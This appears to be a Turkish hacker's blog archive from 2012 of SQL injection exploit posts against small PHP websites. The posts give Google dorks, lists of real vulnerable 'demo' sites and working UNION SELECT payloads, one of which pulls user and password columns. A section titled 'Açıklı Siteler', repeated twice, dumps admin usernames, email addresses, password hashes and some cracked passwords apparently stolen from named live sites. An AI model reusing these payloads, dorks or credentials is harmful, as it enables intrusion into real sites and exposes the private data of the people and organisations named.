#######################################################################
~ Exploit Title: * SibexSystems SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Vendor : http://sibexsystems.com/
~ Date : 17.02.2012 ~
~ Platform : Php ~
#######################################################################
~ Demo Site :
~ http://www.kashifhafeez.com/reply.php?id=1772 [SQL]
#######################################################################
~* Virüslerden Önce Akýl Var.
#######################################################################
~* Bilinmezlik DiyarinDan
#######################################################################
~* Olmassa Olmazimdir Bazi seyler.
#######################################################################
~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in
#######################################################################
~ Darkness Devil,Mugair,MüHüR,Nikolay,Tekfurdagli,Evillord,portechine07
#######################################################################
blind sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
blind sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
17 Şubat 2012 Cuma
SibexSystems SQL Injection
16 Şubat 2012 Perşembe
IGNITION S.A.R.L. SQL Injection~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * IGNITION s.a.r.l. SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Software Website: http://www.educomoverseas.com
~ Date : 14.02.2012 ~
~ Platform : Php ~
~ Dork : Designed and powered by IGNITION s.a.r.l.
########################################################
~ Demo Site :
~ http://www.educomoverseas.com/summer_camp/details.php?c=223&sc_id=2[SQL]
########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in
########################################################
~ Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
######################################################## http://packetstormsecurity.org/files/109794/IGNITION-S.A.R.L.-SQL-Injection.html
Xenon Web Services SQL Injection~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * Xenon Web Services SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Vendor: http://xe.co.za/
~ Date : 14.02.2012 ~
~ Platform : Php ~
########################################################
~ Demo Site :
~ www.kawasakisa.co.za/news_details.php?news_id=385 [SQL]
Exploit :
http://localhost/pview.php?id=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/4,/**/@@version,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14,/**/15,/**/16,/**/17,/**/18,/**/19,/**/20,/**/21,/**/22--
########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in
########################################################
~ Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
######################################################## http://packetstormsecurity.org/files/109795/Xenon-Web-Services-SQL-Injection.html
13 Şubat 2012 Pazartesi
Worstpreviews SQL Injection
########################################################
~ Exploit Title: * Worstpreviews SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Software Website: http://www.worstpreviews.com/
~ Date : 13.02.2012 ~
~ Vendor : http://hiregroundsoftware.com/
~ Platform : Php ~
~ Dork : trailer.php?id=
########################################################
~ Demo Site :
~ http://www.worstpreviews.com/trailer.php?id=490[SQL]&item=0
Exploit :
http://www.worstpreviews.com/trailer.php?id=490+AND+1=2+UNION+SELECT+1,2--
########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~ Greetz: http://th4mask.blogspot.com ~
########################################################
~ ZoRRoKiN,Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
########################################################
~ Contact to ; th4_mask@windowslive.com ~ http://packetstormsecurity.org/files/109736/Worstpreviews-SQL-Injection.html
8 Şubat 2012 Çarşamba
Cheshire Web Design SQL Injection ~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * Web Design Cheshire SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 08.02.2012 ~
~ Vendor : http://www.cheshirewebdesigners.com/
~ Platform : Php ~
########################################################
~ Demo Site :
~ http://www.headseng.co.uk/view-job?whichJob=1182164
Exploit :
http://localhost/listarivisteuk.php?Id?=(id)viewjob.php?id=212/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14--
########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
TWS Family
~ Mugair,Nikolay,Darkness Devil,Tekfurdaðlý
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
########################################################
http://packetstormsecurity.org/files/109540/Cheshire-Web-Design-SQL-Injection.html
27 Ocak 2012 Cuma
Studio Manolibera Listarivisteuk SQL Injection ~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * Listarivisteuk SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 27.01.2012 ~
~ Platform : Php ~
########################################################
~ Dork: listarivisteuk.php?Id?=
########################################################
~ Demo Site :
~ http://www.fgda.org/listarivisteuk.php?Id=1
Exploit :
http://localhost/listarivisteuk.php?Id?=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2--
Poc//
Panel :HTTP://localhost/login.php
User :User_login
Password :User_pass
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net
########################################################
TWS Family
~ Evillord,Mugair,Nikolay,Darkness Devil
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
########################################################
Special Thanx : HancHer
19 Ocak 2012 Perşembe
Brand PHP SQL Injection ~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * Brand PHP SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 19.01.2012 ~
~ Platform : Php ~
########################################################
~ Dork: brand.php?id=
########################################################
~ Demo Site :
~ http://www.mirabell.com.hk/brand.php?id=2(SQL)
~ http://www.seikocan.com/brand.php?id=51(SQL)
~ http://www.vmax-services.com/brand.php?id=11(SQL)
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazýmdýr. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net
########################################################
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
######################################################## http://packetstormsecurity.org/files/108833/brandphp-sql.txt
Fiche Avion SQL Injection ~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * Fiche Avion SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 19.01.2012 ~
~ Platform : Php ~
########################################################
~ Dork: fiche_avion.php?id=
########################################################
~ Demo Site :
~ http://www.mrcmodelisme.com/fiche_avion.php?id=32(SQL)
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazýmdýr. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net
########################################################
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
########################################################
http://packetstormsecurity.org/files/108826/ficheavion-sql.txt
MaDVideO SQL Injection ~ Th4 MasK [ Bug Res.]
########################################################
~ Exploit Title: * MaDVideO SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 19.01.2012 ~
~ Platform : Php ~
########################################################
~ Dork: vis_madvideo.php?id=
########################################################
~ Demo Site :
~ http://www.maduniverset.dk/vis_madvideo.php?id=59 (SQL)
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazýmdýr. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net
########################################################
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
######################################################## http://packetstormsecurity.org/files/108825/madvideo-sql.txt
Açıklı Siteler :)
http://www.laprepa.edu.gt
password
+------------------------------------+
$1$TJ4.gi2.$TVTMWeA4/Jb2xphooU65C1
la0P/yBbQzQM.
$1$TJ4.gi2.$TVTMWeA4/Jb2xphooU65C1
+------------------------------------+
+---------------+
nombre
+---------------+
Webmaster
laprepa
Administrador
+---------------+
+------------------+
email
+------------------+
info@fiomega.com
+------------------+
---------------------------------------------------------------------------------
http://www.su.edu.eg
[1] admin:admin:admin@site.com
----------------------------------------------------------------------------------------
[+] URL: http://peninsulardeinstalaciones.es/inde...darkc0de,5
['login', 'password']
[1] asturbuproadmin:adminpass:
------------------------------------------------------------------------------------
[+] URL: http://www.mcaleesemarine.com/boat-spec....4,65,66,67
[1] rjsinton:d070408473f135d01eac0025b7b97f77:
[2] bobsinton:d070408473f135d01eac0025b7b97f77:
[3] mcaleese:14da5176cbf075e320f2b6a27215a459:
d070408473f135d01eac0025b7b97f77 MD5 : trebor01
d070408473f135d01eac0025b7b97f77 MD5 : trebor01
14da5176cbf075e320f2b6a27215a459 MD5 : mercury01
---------------------------------------------------------------------------------------
----------+----------------------------------+
| login | password |
+----------+----------------------------------+
| adm_2010 | e66335ca1d98f5ed9923832da0a62c78 |
+----------+----------------------------------+
http://www.ctvc.cc/visas_desc.php?id=2
------------------------------------------------------------------------------
[+] URL: http://rdevack.com/practice_areas_detail...c0de,11,12
[1] goldcoast:79c3cdf740f66a54dc8187d1b72939424e64be08:
[2] rdevack:3af3306df9b8aca3e84d76c227770a2e3ca41fb9:
------------------------------------------------------------------------------
http://www.kinderworld.net/kinderworld/k...19,20,21--
http://www.kinderworld.net/kinderworld/k.../index.php
[1] Admin:stephen.see@kinderworldgroup.com:123:
[2] hieu:hieu.nguyenquy@kinderworldgroup.com:d7981337247a6a08503eccdae26422c1:dE2C43C06aP18NFIW6X32JdnpFoK1TVU:
[3] huy:huy.quanthe@kinderworldgroup.com:310e14edd53a0ec4b6c0e0aa318077a1:ReDnEoaSLZyrWOFEFz6DYcLBg3fKEJlm:
-----------------------------------------------------------------------
http://www.facegis.com
[1] admin:dikakana:
[2] nu:dikakana:
password
+------------------------------------+
$1$TJ4.gi2.$TVTMWeA4/Jb2xphooU65C1
la0P/yBbQzQM.
$1$TJ4.gi2.$TVTMWeA4/Jb2xphooU65C1
+------------------------------------+
+---------------+
nombre
+---------------+
Webmaster
laprepa
Administrador
+---------------+
+------------------+
+------------------+
info@fiomega.com
+------------------+
---------------------------------------------------------------------------------
http://www.su.edu.eg
[1] admin:admin:admin@site.com
----------------------------------------------------------------------------------------
[+] URL: http://peninsulardeinstalaciones.es/inde...darkc0de,5
['login', 'password']
[1] asturbuproadmin:adminpass:
------------------------------------------------------------------------------------
[+] URL: http://www.mcaleesemarine.com/boat-spec....4,65,66,67
[1] rjsinton:d070408473f135d01eac0025b7b97f77:
[2] bobsinton:d070408473f135d01eac0025b7b97f77:
[3] mcaleese:14da5176cbf075e320f2b6a27215a459:
d070408473f135d01eac0025b7b97f77 MD5 : trebor01
d070408473f135d01eac0025b7b97f77 MD5 : trebor01
14da5176cbf075e320f2b6a27215a459 MD5 : mercury01
---------------------------------------------------------------------------------------
----------+----------------------------------+
| login | password |
+----------+----------------------------------+
| adm_2010 | e66335ca1d98f5ed9923832da0a62c78 |
+----------+----------------------------------+
http://www.ctvc.cc/visas_desc.php?id=2
------------------------------------------------------------------------------
[+] URL: http://rdevack.com/practice_areas_detail...c0de,11,12
[1] goldcoast:79c3cdf740f66a54dc8187d1b72939424e64be08:
[2] rdevack:3af3306df9b8aca3e84d76c227770a2e3ca41fb9:
------------------------------------------------------------------------------
http://www.kinderworld.net/kinderworld/k...19,20,21--
http://www.kinderworld.net/kinderworld/k.../index.php
[1] Admin:stephen.see@kinderworldgroup.com:123:
[2] hieu:hieu.nguyenquy@kinderworldgroup.com:d7981337247a6a08503eccdae26422c1:dE2C43C06aP18NFIW6X32JdnpFoK1TVU:
[3] huy:huy.quanthe@kinderworldgroup.com:310e14edd53a0ec4b6c0e0aa318077a1:ReDnEoaSLZyrWOFEFz6DYcLBg3fKEJlm:
-----------------------------------------------------------------------
http://www.facegis.com
[1] admin:dikakana:
[2] nu:dikakana:
16 Ocak 2012 Pazartesi
Bir Kaç Bug.
BPTSoft Web Solution Group SQL Injection
Dork = site:.ir intext:Copyright 2005-2009 BPTSoft Web Solution Group
YABSoft Advanced Image Hosting Script SQL Injection
Dork = view_comments.php?gal= Kullanıcagınız Yöntem =view_comments.php?gal=
union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users--
Joomla Contushdvideoshare SQL InjectionDork = com_contushdvideoshare 4 Ocak 2012 Çarşamba
Logement Laval SQL Injection ~ Th4 MasK [ Bug Res.]
#######################################################
~ Exploit Title: * Logement Laval SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 04.01.2012 ~
~ Platform : Php ~
########################################################
~ Google Dork: logement_laval_location.php?id=
########################################################
~ Demo Site :
~ hhttp://www.meduane-habitat.fr/logement_laval_location.php?id=131(SQL)
~ Panel = http://localhost/admin
~ ÞÝfre Ve Ad = passe , nom
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazdir Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz:http://th4mask.blogspot.com/
########################################################
~ TurkWebSecurity ~ http://th4mask.blogspot.com/
######################################################## http://packetstormsecurity.org/files/108344/logementlaval-sql.txt
9 Aralık 2011 Cuma
Ficha Blind SQL Injection
#########################################
~ Exploit Title: * Ficha Blind SQL Injection*
~ Google Dork: inurl:"ficha.php?id="
~ Author: Th4 MasK
~ Tested on: *Apache/2.3.3*
~ Date :09.12.2011
~ Platform : Php
#########################################
Demos Site :http://www.nibbledpencil.com/ficha.php?id=336'a
http://www.eurozinco.com/en/ficha.php?id=11'a
http://www.filmfactoryentertainment.com/ficha.php?id=61'a
########################################
Land of uncertainty
########################################
~ Contact:th4_mask@windowslive.com
~ Greetz:http://www.turkhackteam.net ~ http://th4mask.blogspot.com/
ZoRRoKiN & Margu & Gezginler & The Levis
######################################## Th4 MasK ~ Bug Res.
Kaydol:
Kayıtlar (Atom)